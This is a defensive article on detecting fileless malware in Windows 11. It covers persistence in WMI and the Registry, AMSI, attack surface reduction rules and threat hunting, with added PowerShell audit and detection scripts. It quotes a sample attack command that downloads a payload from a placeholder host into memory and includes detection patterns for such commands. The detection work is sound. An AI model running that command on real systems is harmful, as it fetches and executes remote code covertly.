How to detect fileless malware in Windows 11

Last updated: 23/11/2025

  • Fileless malware runs in memory and abuses legitimate processes such as PowerShell and WMI.
  • Effective detection requires monitoring behavior and analyzing memory, not just files.
  • AMSI, process telemetry, attack surface reduction rules, and threat hunting are the key capabilities in Windows 11.
  • Persistence in WMI, the Registry and the MBR, together with firmware and USB, widens the attack surface.

How to detect fileless malware

How do you detect fileless malware? Fileless attacks have grown steadily and, to make matters worse, Windows 11 is not immune. This technique bypasses the disk and relies on memory and on legitimate tools, which is why signature-based antivirus products struggle with it. If you are looking for a robust way to detect it, the answer lies in combining telemetry, behavioral analysis, and the controls Windows itself provides.

In the current ecosystem, campaigns that abuse PowerShell, WMI, or mshta combine with techniques such as memory injection, "never touch the disk" execution, and even firmware abuse. The key is to understand the threat map, the phases of an attack, and the traces they leave even when everything happens in RAM.

What is fileless malware and why is it a concern in Windows 11?

When we talk about "fileless" threats, we mean malicious code that does not need to drop new executables on the file system. It typically injects into running processes and executes in RAM, relying on Microsoft-signed interpreters and binaries (for example PowerShell, WMI, rundll32, mshta). This reduces its footprint and lets it slip past engines that only look for suspicious files.

Even Office documents or PDFs that exploit a vulnerability to run commands count as part of the phenomenon, because they trigger in-memory execution without dropping binaries that would be useful for detection. Macro and DDE abuse in Office stands out, since the code runs inside legitimate processes such as WinWord.

Attackers combine social engineering (phishing, spam links) with tooling: a user's click starts a chain in which scripts download and execute the final payload in memory, avoiding any trail on disk. The objective ranges from data theft to running ransomware to silent lateral movement.


Typologies by footprint on the system: from 'pure' to hybrid

To avoid conceptual confusion, it helps to classify threats by how they interact with files. This categorization makes clear what persists, where the code lives, and what traces it leaves.

Type I: no file activity

Fully fileless malware writes nothing to disk. A classic example is using a network vulnerability (such as the EternalBlue vector in its day) to implant a memory-resident backdoor (such as DoublePulsar). Here everything happens in RAM and there are no artifacts in the file system.

Another option is infecting the firmware of a device: BIOS/UEFI, network adapters, USB peripherals (BadUSB-style techniques) or even CPU subsystems. These survive reboots and reinstalls, with the added difficulty that few products inspect firmware. They are complex, rare attacks, but dangerous because of their stealth and durability.

Type II: indirect file activity

Here the malware does not "drop" itself as an executable, but uses system-managed structures that are ultimately stored as files. For example, backdoors that plant PowerShell commands in the WMI repository and trigger them with event filters. The backdoor can be installed from the command line without dropping any binary, but the WMI repository lives on disk as legitimate data, which makes it hard to clean without affecting the system.

From a practical standpoint these are considered fileless, because the container (WMI, Registry, and so on) is not a classic detectable executable and cleaning it is not trivial. The result: stealthy persistence with few "abnormal" traces.


Type III: requires file activity

Some scenarios maintain persistence that is 'fileless' in concept, yet need files as triggers. The canonical example is Kovter: it registers a shell verb for a random file extension; when a file with that extension is opened, a small script that invokes mshta.exe is launched, and it reconstructs the malicious payload from the Registry.

The twist is that the "bait" files with random extensions contain nothing identifiable, and most of the code lives in the Registry (another container). That is why they are categorized as fileless in practice, even though strictly speaking they depend on one or more disk artifacts as triggers.
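The Type II and Type III containers described above (WMI event subscriptions, Registry autorun keys, and Kovter-style per-user shell verbs) can be enumerated directly. The following audit script is an added example and is not part of the original article; it assumes an elevated PowerShell session on the host being examined, and its pattern list of script hosts and download/decoding keywords is an illustrative starting point rather than a complete signature set.

```powershell
# Added example, not part of the original article: enumerate the containers that Type II/III
# fileless malware uses for persistence and flag entries that reference script hosts.
# Assumptions: runs elevated on a Windows 10/11 host; the regex is an illustrative starting list.

$SuspiciousPattern = '(?i)powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|javascript:|vbscript:|frombase64string|downloadstring|invoke-expression|\biex\b|-enc'

function Get-WmiPersistence {
    # Permanent WMI subscriptions live in root\subscription: an __EventFilter (trigger, WQL query) is
    # bound to an __EventConsumer (action). CommandLineEventConsumer runs a command line and
    # ActiveScriptEventConsumer runs inline VBScript/JScript; both are classic fileless containers.
    $ns = 'root\subscription'
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter   -ErrorAction SilentlyContinue
    foreach ($c in $consumers) {
        $action = if ($c.CommandLineTemplate) { $c.CommandLineTemplate }
                  elseif ($c.ScriptText)      { $c.ScriptText }
                  else                        { $c.ExecutablePath }
        [PSCustomObject]@{
            Source     = 'WMI consumer'
            Location   = "$ns\$($c.CimClass.CimClassName)"
            Name       = $c.Name
            Action     = [string]$action
            Suspicious = [bool]([string]$action -match $SuspiciousPattern)
        }
    }
    foreach ($f in $filters) {
        # Report every filter as well: an innocuous-looking query (e.g. on Win32_PerfFormattedData)
        # is the usual trigger, so the consumer it is bound to is what needs a closer look.
        [PSCustomObject]@{ Source = 'WMI filter'; Location = "$ns\__EventFilter"; Name = $f.Name
                           Action = $f.Query;     Suspicious = $false }
    }
}

function Get-RegistryAutoruns {
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    foreach ($k in $keys) {
        $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata (PSPath, PSParentPath, ...)
            $value = [string]$p.Value
            [PSCustomObject]@{ Source = 'Registry'; Location = $k; Name = $p.Name; Action = $value
                               Suspicious = [bool]($value -match $SuspiciousPattern) }
        }
    }
}

function Get-ShellVerbHandlers {
    # Kovter-style: a per-user class (often a random extension) whose verb launches mshta/wscript
    # with a script that rebuilds the payload from another Registry value.
    Get-ChildItem -Path 'HKCU:\Software\Classes' -ErrorAction SilentlyContinue | ForEach-Object {
        $class = $_
        Get-ChildItem -Path "$($class.PSPath)\shell" -ErrorAction SilentlyContinue | ForEach-Object {
            $cmdKey = "$($_.PSPath)\command"
            if (Test-Path $cmdKey) {
                $cmd = [string](Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
                [PSCustomObject]@{ Source = 'Shell verb'; Location = ($cmdKey -replace '^.*::', '')
                                   Name = $class.PSChildName; Action = $cmd
                                   Suspicious = [bool]($cmd -match $SuspiciousPattern) }
            }
        }
    }
}

$findings = @(Get-WmiPersistence) + @(Get-RegistryAutoruns) + @(Get-ShellVerbHandlers)
'{0} entries inspected, {1} flagged' -f $findings.Count, @($findings | Where-Object Suspicious).Count
$findings | Where-Object Suspicious | Format-Table Source, Name, Action -AutoSize -Wrap
```

A clean workstation normally returns zero flagged entries; the WMI filter rows are printed unflagged on purpose so that a consumer hit can be matched to its trigger. Anything flagged should be compared against a known-good baseline before it is removed, since the same containers are used by legitimate management tooling.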

Vectors and 'hosts' of the infection: where it enters and where it hides

To improve detection, it is essential to map the entry points and the hosts of the infection. This view helps design specific controls alongside the appropriate telemetry.

Exploits

  • File-based (Type III): documents, executables, legacy Flash/Java files, or LNK files can exploit the browser or the engine that renders them so that they load shellcode into memory. The initial vector is a file, but the payload goes to RAM.
  • Network-based (Type I): a packet that exploits a vulnerability (for example in SMB) achieves execution in userland or in the kernel. WannaCry made this path famous. Direct memory load, with no new file.

Hardware

  • Devices (Type I): disk or network card firmware can be modified to run code. Hard to audit, and it persists outside the OS.
  • CPU and management subsystems (Type I): technologies such as Intel ME/AMT have shown paths for communication and execution outside the OS. The attack happens at a very low level, with high stealth potential.
  • USB (Type I): BadUSB lets a USB drive be reprogrammed to act as a keyboard or NIC and inject commands or redirect traffic.
  • BIOS/UEFI (Type I): malicious firmware reprogramming (such as Mebromi) that runs before Windows boots.
  • Hypervisor (Type I): a mini-hypervisor placed beneath the OS to hide its presence. Rare, but already seen in the form of hypervisor rootkits.

Execution and injection

  • File-based (Type III): EXE/DLL/LNK files or scheduled tasks that inject payloads into legitimate processes.
  • Macros (Type III): VBA in Office can decode and run payloads, including full ransomware, with user consent obtained by deception.
  • Scripts (Type II): PowerShell, VBScript or JScript from files, the command line, services, the Registry or WMI. The attacker can type them into a remote session without touching the disk.
  • Boot records (MBR/boot sector) (Type II): families such as Petya overwrite the boot sector to take control at startup. It sits outside the file system, but is accessible to the OS and to modern solutions that can restore it.

How fileless attacks work: phases and signals

Even though they do not drop executable files, campaigns follow a staged script. Understanding the stages makes monitoring possible: the events and the relationships between processes leave a signature.

  • Initial access: phishing attacks using links or attachments, compromised websites, or stolen credentials. Many chains start with an Office document that triggers PowerShell commands.
  • Persistence: backdoors in WMI (filters and subscriptions), Registry execution keys or scheduled tasks that relaunch scripts without any new malicious file.
  • Exfiltration: once data has been collected, it is sent out of the network using trusted processes (browsers, PowerShell, bitsadmin) to blend in with normal traffic.

These patterns are especially insidious because the attack indicators hide in the ordinary: unusual arguments, process chaining, anomalous outbound connections, or access to injection APIs.

Common techniques: from memory to encryption

Threat actors rely on a variety of approaches that optimize stealth. Knowing the most common ones helps build effective detections.

  • Memory residence: loading payloads into the address space of trusted processes that wait to be triggered. Rootkits and hooks in the kernel raise the level of concealment.
  • Registry persistence: storing encrypted blobs in keys and rehydrating them through a legitimate launcher (mshta, rundll32, wscript). An ephemeral installer can self-destruct to minimize its footprint.
  • Credential phishing: using stolen usernames and passwords, the attacker launches scripts and silently plants persistence in the Registry or WMI.
  • 'Fileless' ransomware: encryption and C2 communication are orchestrated from RAM, shrinking the detection window until the damage is visible.
  • Exploit kits: automated chains that detect vulnerabilities and use memory only, after a user click.
  • Documents with code: macros and techniques such as DDE that trigger commands without saving executables to disk.

Industry research has reported a telling figure: during one reporting period in 2018, script-based and PowerShell chain attacks grew by more than 90%, a sign that the vector is favored for its effectiveness.

The challenge for companies and vendors: why blocking is not enough

It is tempting to disable PowerShell or ban macros outright, but that breaks workflows. PowerShell is the backbone of modern administration and Office is essential to the business; blanket blocking is rarely viable.

There are also ways around simple controls: running PowerShell from DLLs via rundll32, packing scripts into EXEs, bringing your own copy of PowerShell, or even hiding scripts inside images and extracting them into memory. So the defense cannot rest on denying that the tools exist.

Another mistake is delegating every decision to the cloud: if the agent has to wait for an answer from a server, you lose the protection window. Telemetry can be uploaded to enrich the data, but mitigation must happen at the endpoint.

How to detect fileless malware in Windows 11: telemetry and behavior

The winning strategy is to monitor processes and memory, not files. Malicious behaviors are more stable than the files used to deliver them, which makes them ideal input for the protection engine.

  • AMSI (Antimalware Scan Interface): intercepts PowerShell, VBScript, or JScript content even when it is generated in memory. Excellent for catching obfuscated strings before execution.
  • Process monitoring: start/stop, PID, parent and child, path, command line and hashes, plus the execution tree to understand the whole story.
  • Memory analysis: detection of injections, hooks, or PE loads that never touch the disk, and scanning of anomalous regions.
  • Boot sector protection: control and restoration of the MBR/EFI when tampering occurs.

In the Microsoft ecosystem, Defender for Endpoint combines AMSI, behavioral monitoring, memory scanning and cloud-based machine learning to weigh indicators against new or obfuscated variants. Other vendors take similar approaches with kernel-resident agents.

A concrete correlation example: from document to PowerShell

Imagine a chain in which Outlook downloads an attachment, Word opens the document, its active content fires, and PowerShell starts with suspicious parameters. Good telemetry would show the command line (for example ExecutionPolicy Bypass, hidden window), connections to untrusted domains, and the creation of child processes that install themselves under AppData.

An agent with local context can stop and roll back the malicious activity without manual intervention, in addition to alerting the SIEM or sending email/SMS notifications. Some commercial products add a correlation layer (StoryLine-type models) that points not at the visible processes (Outlook/Word) but at the entire malicious thread and its origin, so that the whole system can be remediated.

A typical command line might look like this: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload'); what matters is not the exact string but the signals: policy bypass, hidden window, download straight into memory, and in-memory execution.

AMSI, the pipeline and the role of each actor: from endpoint to SOC

Beyond script detection, a good architecture orchestrates steps that help investigate and respond. The more evidence gathered before the payload executes, the better.

  • Script interception: AMSI hands the content (even when it is generated on the fly) to static and dynamic analysis in the anti-malware pipeline.
  • Event recording: PIDs, binaries, hashes, paths, arguments and other data are captured, building the process tree that leads to the final payload.
  • Detection and reporting: detections are surfaced in the product console and forwarded to network platforms (NDR) for cross-visibility.
  • User assurance: even if a script is injected into memory, the AMSI framework intercepts it on supported versions of Windows.
  • Administrator capabilities: policy configuration to enable script analysis, behavioral restrictions and alert generation from the console.
  • SOC work: extracting artifacts (VM UUID, OS version, file type, the initiating process and its parent, hashes and command lines) to reconstruct the history and feed future policy.
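The script interception step can be verified from PowerShell itself by calling the AMSI API directly, which is useful for confirming that the registered provider (Defender or a third-party engine) is actually returning verdicts on an endpoint. The block below is an added example, not code from the original article or from Microsoft; it assumes a Windows 10/11 host with an AMSI provider installed, uses the published AmsiInitialize/AmsiScanBuffer/AmsiUninitialize functions from amsi.dll, and feeds them Microsoft's documented AMSI test string (the AMSI equivalent of the EICAR file). The test string is assembled at run time from fragments precisely so that PowerShell's own scan of this script text does not refuse to run it; the manual scan then sees the fully materialized string, which is the point the article makes about content "generated on the fly".

```powershell
# Added example, not from the original article: ask AMSI for a verdict on buffers the way
# PowerShell does for each script block. Assumptions: Windows 10/11 with an AMSI provider
# (e.g. Microsoft Defender Antivirus) enabled; P/Invoke signatures follow amsi.h.
$AmsiSource = @"
using System;
using System.Runtime.InteropServices;
public static class AmsiNative {
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiInitialize(string appName, out IntPtr amsiContext);
    [DllImport("amsi.dll")]
    public static extern void AmsiUninitialize(IntPtr amsiContext);
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiScanBuffer(IntPtr amsiContext, byte[] buffer, uint length,
                                            string contentName, IntPtr amsiSession, out int result);
}
"@
if (-not ('AmsiNative' -as [type])) { Add-Type -TypeDefinition $AmsiSource }

function Test-AmsiVerdict {
    param([Parameter(Mandatory)][string]$Content, [string]$ContentName = 'demo.ps1')
    $ctx = [IntPtr]::Zero
    $hr = [AmsiNative]::AmsiInitialize('FilelessDetectionDemo', [ref]$ctx)
    if ($hr -ne 0) { throw ('AmsiInitialize failed: 0x{0:x8}' -f $hr) }
    try {
        # PowerShell submits script text as UTF-16, so mirror that encoding here.
        $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Content)
        $result = 0
        $hr = [AmsiNative]::AmsiScanBuffer($ctx, $bytes, [uint32]$bytes.Length, $ContentName,
                                           [IntPtr]::Zero, [ref]$result)
        if ($hr -ne 0) { throw ('AmsiScanBuffer failed: 0x{0:x8}' -f $hr) }
        # AMSI_RESULT: 0 = clean, 1 = not detected, 16384+ = blocked by admin policy, 32768+ = detected.
        $verdict = if ($result -ge 32768) { 'Detected' }
                   elseif ($result -ge 16384) { 'BlockedByAdmin' }
                   elseif ($result -eq 0)     { 'Clean' }
                   else                       { 'NotDetected' }
        [PSCustomObject]@{ ContentName = $ContentName; RawResult = $result; Verdict = $verdict }
    }
    finally {
        [AmsiNative]::AmsiUninitialize($ctx)
    }
}

# Constructed samples. The test string is the one Microsoft publishes for validating AMSI
# providers; it is split so that this script's own text does not contain it contiguously.
$Benign   = 'Get-Process | Select-Object -First 3'
$TestStr  = 'AMSI Test ' + 'Sample: 7e72c3ce-861b-4339-' + '8740-0ac1484c1386'

Test-AmsiVerdict -Content $Benign  -ContentName 'benign.ps1'
Test-AmsiVerdict -Content $TestStr -ContentName 'amsi-test-string.ps1'
```

With Defender active the second call returns a Verdict of Detected (RawResult 32768); the first returns Clean or NotDetected depending on the provider. If both come back NotDetected, no provider is answering, and the "script interception" bullet above is not actually in force on that host, which is itself a finding worth raising.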

When the platform allows memory dumps to be exported together with the execution context, researchers can build new detections and strengthen protection against similar cases.

Practical measures in Windows 11: prevention and hunting

Configure Windows 11 properly in 2025

In addition to having an EDR with memory analysis and AMSI, Windows 11 lets you close attack surface and improve visibility with native controls.

  • PowerShell logging and restrictions: enable Script Block Logging and Module Logging, apply restricted language modes where feasible, and control the use of Bypass / hidden windows.
  • Attack Surface Reduction (ASR) rules: block script launches from Office processes and WMI/PsExec abuse where they are not needed.
  • Office macro policies: disabled by default, internal macro signing and strict trust; monitor legacy DDE flows.
  • WMI and Registry auditing: watch event subscriptions and autorun keys (Run, RunOnce, Winlogon), along with scheduled task creation.
  • Boot protection: enable Secure Boot, check MBR/EFI integrity and verify that nothing was modified at startup.
  • Patching and hardening: close vulnerabilities in browsers, Office components, and network services.
  • Awareness: train users and technical teams on phishing and on the signs of covert execution.
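The logging, ASR and macro items in the list above can be applied from an elevated PowerShell session on a host that uses Microsoft Defender Antivirus. The following is an added example and not part of the original article; the rule GUIDs are the identifiers Microsoft publishes for the named ASR rules and the Office value is the one written by the "Block macros from running in Office files from the Internet" policy, but both should be verified against current Microsoft documentation for your build before deployment. The ASR rules are deliberately applied in audit mode first.

```powershell
# Added example, not from the original article: apply the PowerShell logging, ASR and Office macro
# controls listed above on a Windows 11 host with Microsoft Defender Antivirus. Run elevated.
# Assumptions: ASR GUIDs and the Office policy value match current Microsoft documentation.

function Enable-PowerShellLogging {
    $root = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    # Script Block Logging writes the code PowerShell actually compiles, after obfuscation is
    # resolved, to Microsoft-Windows-PowerShell/Operational as Event ID 4104.
    New-Item -Path "$root\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$root\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # Module Logging (Event ID 4103) records pipeline details for every module ('*').
    New-Item -Path "$root\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$root\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$root\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String
}

function Block-InternetMacros {
    # Policy value behind "Block macros from running in Office files from the Internet" (Office 16.x).
    foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        New-Item -Path $key -Force | Out-Null
        Set-ItemProperty -Path $key -Name blockcontentexecutionfrominternet -Value 1 -Type DWord
    }
}

# ASR rules aimed at the chains this article describes: Office -> script host, obfuscated scripts,
# WMI persistence, PsExec/WMI lateral movement, payloads arriving through the mail client.
$AsrRules = [ordered]@{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B' = 'Block Win32 API calls from Office macros'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    'D1E49AAC-8F56-4280-B9BA-993A6D77406C' = 'Block process creations originating from PSExec and WMI commands'
    'E6DB77E5-3DF2-4CF1-B95A-636979351E5B' = 'Block persistence through WMI event subscription'
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
}

function Set-FilelessAsrRules {
    param([ValidateSet('AuditMode', 'Enabled')][string]$Mode = 'AuditMode')
    # AuditMode logs what each rule would block (Event ID 1122 in
    # Microsoft-Windows-Windows Defender/Operational) without breaking workflows; promote a rule to
    # Enabled only once the audit events show no legitimate hits.
    foreach ($id in $AsrRules.Keys) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Mode
    }
}

function Get-FilelessAsrStatus {
    # Get-MpPreference returns parallel arrays of IDs and numeric actions; map them back to names.
    $actionName = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }
    $pref = Get-MpPreference
    for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
        $id = $pref.AttackSurfaceReductionRules_Ids[$i].ToUpperInvariant()
        if ($AsrRules.Contains($id)) {
            $code = [int]$pref.AttackSurfaceReductionRules_Actions[$i]
            [PSCustomObject]@{ Rule = $AsrRules[$id]; Id = $id; Action = $actionName[$code] }
        }
    }
}

Enable-PowerShellLogging
Block-InternetMacros
Set-FilelessAsrRules -Mode AuditMode
Get-FilelessAsrStatus | Format-Table -AutoSize
```

Organizations that manage Defender through Intune or Group Policy should apply the same settings there instead, since policy-managed values override local Set-MpPreference changes. The logging keys take effect for new PowerShell sessions only.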

For hunting, focus your queries on: process creation from Office to PowerShell/MSHTA, arguments containing downloadstring/downloadfile, scripts with obvious obfuscation, injection into other processes, and outbound connections to suspicious TLDs. Cross-reference these signals with reputation and frequency data to reduce noise.
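Both the correlation example earlier (Outlook to Word to PowerShell with bypass, hidden window and download-to-memory arguments) and the hunting queries just listed reduce to the same two operations: scoring each process-creation event for fileless signals, and walking a hit back up its parent chain to the root process. The block below is an added example and is not part of the original article. The sample events are constructed to reproduce the article's chain, including its sample command line; the Get-SysmonProcessEvents helper, which assumes Sysmon is installed with Event ID 1 enabled, feeds real events into the same functions.

```powershell
# Added example, not from the original article: score process-creation events for the fileless
# signals discussed in the article and reconstruct the chain that led to each hit.
# Sample events are constructed; Get-SysmonProcessEvents assumes Sysmon (Event ID 1) is present.

$OfficeParents = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'ACRORD32.EXE'
$LolBins       = 'POWERSHELL.EXE', 'PWSH.EXE', 'MSHTA.EXE', 'WSCRIPT.EXE', 'CSCRIPT.EXE',
                 'RUNDLL32.EXE', 'REGSVR32.EXE', 'CMD.EXE'

# Weighted regexes over the command line; weights are illustrative tuning values.
$CommandLineRules = @(
    @{ Label = 'exec-policy bypass'; Weight = 2; Regex = '(?i)-e(xecutionpolicy|p)\s+bypass' }
    @{ Label = 'hidden window';      Weight = 2; Regex = '(?i)-w(indowstyle)?\s+hidden' }
    @{ Label = 'encoded command';    Weight = 3; Regex = '(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}' }
    @{ Label = 'download to memory'; Weight = 3; Regex = '(?i)downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|invoke-restmethod|net\.webclient' }
    @{ Label = 'dynamic eval';       Weight = 2; Regex = '(?i)\biex\b|invoke-expression' }
    @{ Label = 'base64/obfuscation'; Weight = 2; Regex = '(?i)frombase64string|\[char\]\s*\d+|-join\b' }
    @{ Label = 'script: protocol';   Weight = 3; Regex = '(?i)\b(javascript|vbscript):' }
    @{ Label = 'no profile';         Weight = 1; Regex = '(?i)-nop(rofile)?\b' }
)

function Get-FilelessScore {
    param([Parameter(Mandatory)][psobject]$Event)
    $parent = ([IO.Path]::GetFileName($Event.ParentImage)).ToUpperInvariant()
    $image  = ([IO.Path]::GetFileName($Event.Image)).ToUpperInvariant()
    $score = 0
    $reasons = [System.Collections.Generic.List[string]]::new()
    # The strongest single signal is the chain itself: an Office process spawning a script host.
    if ($OfficeParents -contains $parent -and $LolBins -contains $image) {
        $score += 4; $reasons.Add("office parent $parent -> $image")
    }
    foreach ($r in $CommandLineRules) {
        if ($Event.CommandLine -match $r.Regex) { $score += $r.Weight; $reasons.Add($r.Label) }
    }
    [PSCustomObject]@{ ProcessId = $Event.ProcessId; Image = $image; Parent = $parent
                       Score = $score; Suspicious = ($score -ge 5); Reasons = ($reasons -join ', ') }
}

function Get-ProcessChain {
    # Walk ParentProcessId links back to the root: the "story" an analyst needs, not just the leaf.
    param([psobject[]]$Events, [int]$ProcessId)
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.ProcessId] = $e }
    $chain = @(); $seen = @{}; $cur = $ProcessId
    while ($byPid.ContainsKey($cur) -and -not $seen.ContainsKey($cur)) {
        $seen[$cur] = $true
        $chain = @([IO.Path]::GetFileName($byPid[$cur].Image)) + $chain
        $cur = [int]$byPid[$cur].ParentProcessId
    }
    $chain -join ' -> '
}

function Get-SysmonProcessEvents([int]$MaxEvents = 500) {
    # Sysmon Event ID 1 (process create), parsed from the event XML. Returns nothing if Sysmon is absent.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [PSCustomObject]@{ ProcessId = [int]$d.ProcessId; ParentProcessId = [int]$d.ParentProcessId
                           Image = $d.Image; ParentImage = $d.ParentImage; CommandLine = $d.CommandLine }
    }
}

# Constructed sample events reproducing the article's chain plus a benign admin session.
$Office = 'C:\Program Files\Microsoft Office\root\Office16'
$PS     = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$SampleEvents = @(
    [PSCustomObject]@{ ProcessId = 1200; ParentProcessId = 900;  Image = 'C:\Windows\explorer.exe'; ParentImage = 'C:\Windows\System32\userinit.exe'; CommandLine = 'explorer.exe' }
    [PSCustomObject]@{ ProcessId = 4100; ParentProcessId = 1200; Image = "$Office\OUTLOOK.EXE"; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = '"OUTLOOK.EXE"' }
    [PSCustomObject]@{ ProcessId = 4312; ParentProcessId = 4100; Image = "$Office\WINWORD.EXE"; ParentImage = "$Office\OUTLOOK.EXE"; CommandLine = '"WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\invoice.docm"' }
    [PSCustomObject]@{ ProcessId = 4520; ParentProcessId = 4312; Image = $PS; ParentImage = "$Office\WINWORD.EXE"; CommandLine = "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload')" }
    [PSCustomObject]@{ ProcessId = 5010; ParentProcessId = 1200; Image = $PS; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'powershell -NoProfile -Command Get-Service' }
)

$results = $SampleEvents | ForEach-Object { Get-FilelessScore -Event $_ }
$results | Where-Object Suspicious | ForEach-Object {
    "[score $($_.Score)] $(Get-ProcessChain -Events $SampleEvents -ProcessId $_.ProcessId) :: $($_.Reasons)"
}
# For live data: $live = Get-SysmonProcessEvents; $live | ForEach-Object { Get-FilelessScore $_ }
```

On the sample data only PID 4520 crosses the threshold (score 12: Office parent, policy bypass, hidden window, download to memory, no profile) and its chain prints as explorer.exe -> OUTLOOK.EXE -> WINWORD.EXE -> powershell.exe; the admin's `Get-Service` session scores 1. The weights and the threshold are the part to tune per environment, using the reputation and frequency data the paragraph above recommends.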

What can each engine detect today?

Microsoft's enterprise solutions combine AMSI, behavioral analytics, memory scanning and boot sector protection, plus cloud-based ML models to evaluate emerging threats. Other vendors use multi-level analysis to separate malicious from legitimate software, with automatic rollback of changes.

A storyline-based approach lets you identify the root cause (for example, an Outlook attachment that started the chain) and remove the entire tree: scripts, keys, tasks and intermediate binaries, instead of chasing only the visible symptoms.

Common mistakes and how to avoid them


Blocking PowerShell without an alternative way to administer systems is not only impractical, there are also ways to invoke it indirectly. The same goes for macros: either you govern them with policies and signing, or the business suffers. It is better to focus on telemetry and behavior.

Another mistake is believing an allowlist solves everything: fileless techniques rely precisely on trusted apps. Controls must watch what those apps do and how they interact, not just whether they are permitted.

Taking all of the above into account, fileless malware stops being a "ghost" once you watch what matters: behavior, memory, and the history of every action. Combining AMSI, rich process telemetry, native Windows 11 controls, and an EDR layer with behavioral analysis tilts the balance in your favor. Add sensible policies for macros and PowerShell, WMI/Registry auditing, and hunting that monitors command lines and process trees, and you have a defense that cuts the chain before it does damage.

Category:
computer networks